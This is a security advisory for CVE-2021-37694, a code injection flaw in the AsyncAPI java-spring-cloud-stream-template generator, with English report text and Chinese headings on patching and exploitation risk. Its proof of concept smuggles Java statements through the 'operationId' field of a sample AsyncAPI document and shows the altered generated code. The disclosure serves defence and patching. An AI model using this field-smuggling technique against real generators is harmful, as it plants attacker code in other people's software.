CVE-2021-37694
Code injection issue for java-spring-cloud-stream-template
描述
The following was initially reported by @jonaslagoni: Given the following command: `ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output` With the following AsyncAPI document: ```json { "asyncapi": "2.0.0", "info": { "title": "Streetlight", "version": "1.0.0" }, "defaultContentType": "json", "channels": { "security/audit/channel": { "description": "Channel for the turn on command which should turn on the streetlight", "parameters": { "streetlight_id": { "description": "The ID of the streetlight", "schema": { "type": "string" } } }, "publish": { "operationId": "test() { System.out.println(\"injected\"); return test(0); }\n public Consumer<CustomClass> someothername", "message": { "name": "TurnonCommand", "payload": { "$ref": "#/components/schemas/CustomClass" } } } } }, "components": { "schemas" : { "CustomClass": { "type": "object", "properties": { "prop": { "type": "string" } } } } } } ``` Which changes the following output: ```java ... @Bean public Consumer<CustomClass> test() { // Add business logic here. return null; } ... ``` To ```java ... @Bean public Consumer<CustomClass> test() { System.out.println("injected"); return someothername(); } public Consumer<CustomClass> someothername() { // Add business logic here. return null; } ... ```
如何修補 CVE-2021-37694
要修補 CVE-2021-37694,請將受影響套件升級到下列已修補版本。
- —升級至 0.7.0 或更新版本
CVE-2021-37694 正在被利用嗎?
低 — EPSS 為 0.2%,目前沒有觀察到大規模利用活動。
受影響套件(1)
- from 0, < 0.7.0